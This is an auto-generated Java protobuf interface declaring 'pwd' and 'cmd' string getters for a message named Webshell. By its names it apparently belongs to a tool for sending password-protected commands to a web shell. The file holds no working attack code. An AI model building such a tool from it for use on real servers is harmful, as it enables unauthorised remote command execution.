// Generated by the protocol buffer compiler.  DO NOT EDIT!
// source: webshell.proto

package com.demo.shell.protocol;

public interface WebshellOrBuilder extends
    // @@protoc_insertion_point(interface_extends:protocol.Webshell)
    com.google.protobuf.MessageOrBuilder {

  /**
   * <code>string pwd = 1;</code>
   * @return The pwd.
   */
  java.lang.String getPwd();
  /**
   * <code>string pwd = 1;</code>
   * @return The bytes for pwd.
   */
  com.google.protobuf.ByteString
      getPwdBytes();

  /**
   * <code>string cmd = 2;</code>
   * @return The cmd.
   */
  java.lang.String getCmd();
  /**
   * <code>string cmd = 2;</code>
   * @return The bytes for cmd.
   */
  com.google.protobuf.ByteString
      getCmdBytes();
}
